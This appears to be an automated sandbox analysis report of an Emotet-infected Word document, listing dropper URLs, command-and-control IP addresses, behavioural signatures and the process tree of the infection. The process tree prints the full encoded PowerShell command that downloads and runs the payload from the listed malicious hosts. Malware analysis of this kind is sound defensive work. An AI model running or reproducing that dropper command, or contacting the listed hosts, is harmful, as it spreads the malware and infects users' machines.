Analysis

  • max time kernel
    26s
  • resource
    win10v191014
  • submitted
    17-01-2020 23:36

General

  • Target

    067f7ee3c1948b64a5c7ef7c2e212f6f563506fbfc1884c030a8d25f60ff06c1

  • Sample

    200117-sshjqkwtpe

  • SHA256

    067f7ee3c1948b64a5c7ef7c2e212f6f563506fbfc1884c030a8d25f60ff06c1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://okaseo.com/cache/12zl5o-duttqzih2-31839309/

exe.dropper

https://koddata.com/wp-content/VDgENx/

exe.dropper

https://parentingtopsecrets.com/pts/ys8cwojcvc-k1ks0vpkk9-3619095223/

exe.dropper

http://neproperty.in/cgi-bin/hjjz1r5p-5n7mea41-7609513198/

exe.dropper

https://mcuong.000webhostapp.com/wp-admin/aggrp2crnz-nt74vk3f-91560/

Extracted

Family

emotet

C2

98.192.74.164:80

59.135.126.129:443

24.70.40.15:8080

178.33.167.120:8080

144.76.56.36:8080

176.58.93.123:80

51.38.134.203:8080

58.92.179.55:443

190.201.144.85:7080

201.183.251.100:80

192.210.217.94:8080

14.161.30.33:443

212.112.113.235:80

23.253.207.142:8080

1.217.126.11:443

61.221.152.140:80

78.189.165.52:8080

149.202.153.251:8080

91.73.169.210:80

212.129.14.27:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\067f7ee3c1948b64a5c7ef7c2e212f6f563506fbfc1884c030a8d25f60ff06c1.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4880
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABYAGgAYQB6AHoAdwB4AGkAbQBoAGsAcQA9ACcAQQB6AHkAYwBjAGkAcAB0AGsAaQB3ACcAOwAkAEcAZwBzAHIAcQBvAG4AdAByAHgAaAAgAD0AIAAnADkANAA4ACcAOwAkAFMAdwBsAG8AZQBqAGUAaABuAGUAegA9ACcASAB0AHkAaQBhAHoAeABuAHQAcwB1AGUAbQAnADsAJABDAGwAbgBpAHYAYQBiAGIAbwBvAGQAeQB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAGcAcwByAHEAbwBuAHQAcgB4AGgAKwAnAC4AZQB4AGUAJwA7ACQAVwBzAGMAYQBuAGoAcQBxAD0AJwBMAGgAbAB0AGwAdQBkAHoAbQBoAHoAbQB6ACcAOwAkAEMAZwB0AHoAagB5AHcAeAB5AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAEUAdAAuAHcAZQBiAEMATABpAEUATgB0ADsAJABPAHQAegB1AHoAcQBnAHEAcgBzAHAAPQAnAGgAdAB0AHAAcwA6AC8ALwBvAGsAYQBzAGUAbwAuAGMAbwBtAC8AYwBhAGMAaABlAC8AMQAyAHoAbAA1AG8ALQBkAHUAdAB0AHEAegBpAGgAMgAtADMAMQA4ADMAOQAzADAAOQAvACoAaAB0AHQAcABzADoALwAvAGsAbwBkAGQAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBWAEQAZwBFAE4AeAAvACoAaAB0AHQAcABzADoALwAvAHAAYQByAGUAbgB0AGkAbgBnAHQAbwBwAHMAZQBjAHIAZQB0AHMALgBjAG8AbQAvAHAAdABzAC8AeQBzADgAYwB3AG8AagBjAHYAYwAtAGsAMQBrAHMAMAB2AHAAawBrADkALQAzADYAMQA5ADAAOQA1ADIAMgAzAC8AKgBoAHQAdABwADoALwAvAG4AZQBwAHIAbwBwAGUAcgB0AHkALgBpAG4ALwBjAGcAaQAtAGIAaQBuAC8AaABqAGoAegAxAHIANQBwAC0ANQBuADcAbQBlAGEANAAxAC0ANwA2ADAAOQA1ADEAMwAxADkAOAAvACoAaAB0AHQAcABzADoALwAvAG0AYwB1AG8AbgBnAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQBnAGcAcgBwADIAYwByAG4AegAtAG4AdAA3ADQAdgBrADMAZgAtADkAMQA1ADYAMAAvACcALgAiAFMAYABwAGwASQBUACIAKAAnACoAJwApADsAJABLAGEAeQBkAHEAagByAGgAYgBrAHYAYgB5AD0AJwBSAGQAYwBsAHAAcwBsAHQAaQB5AHIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAYgBjAGYAYQByAGIAbgAgAGkAbgAgACQATwB0AHoAdQB6AHEAZwBxAHIAcwBwACkAewB0AHIAeQB7ACQAQwBnAHQAegBqAHkAdwB4AHkALgAiAGQATwBgAHcAbgBMAE8AQQBgAGQAYABGAEkAbABFACIAKAAkAEIAYgBjAGYAYQByAGIAbgAsACAAJABDAGwAbgBpAHYAYQBiAGIAbwBvAGQAeQB6ACkAOwAkAFUAZABqAHMAaABiAGQAaQA9ACcARQBuAHUAYQBrAGkAcABzAGUAagAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAEMAbABuAGkAdgBhAGIAYgBvAG8AZAB5AHoAKQAuACIATABFAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADkAMQA3ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQAQwBsAG4AaQB2AGEAYgBiAG8AbwBkAHkAegApADsAJABKAG8AZwBoAHkAaABxAGYAegBkAHIAbQB4AD0AJwBVAHgAbQBmAHoAcQB5AHkAJwA7AGIAcgBlAGEAawA7ACQAQgBrAHMAZwBtAHcAYgBlAGkAYQBlAGEAPQAnAEEAYgBoAGYAagBjAG4AbQBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAeAB0AHIAZgBsAHAAbABwAHgAdwB4AHoAPQAnAFAAaQBwAGEAeAB0AGQAaABlACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:4460
    • C:\Users\Admin\948.exe
      "C:\Users\Admin\948.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4704
      • C:\Users\Admin\948.exe
        --17fd2f1b
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:4620

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4620-10-0x0000000002250000-0x0000000002267000-memory.dmp

    Filesize

    92KB

  • memory/4620-11-0x0000000000400000-0x00000000004B8000-memory.dmp

    Filesize

    736KB

  • memory/4704-7-0x0000000002220000-0x0000000002237000-memory.dmp

    Filesize

    92KB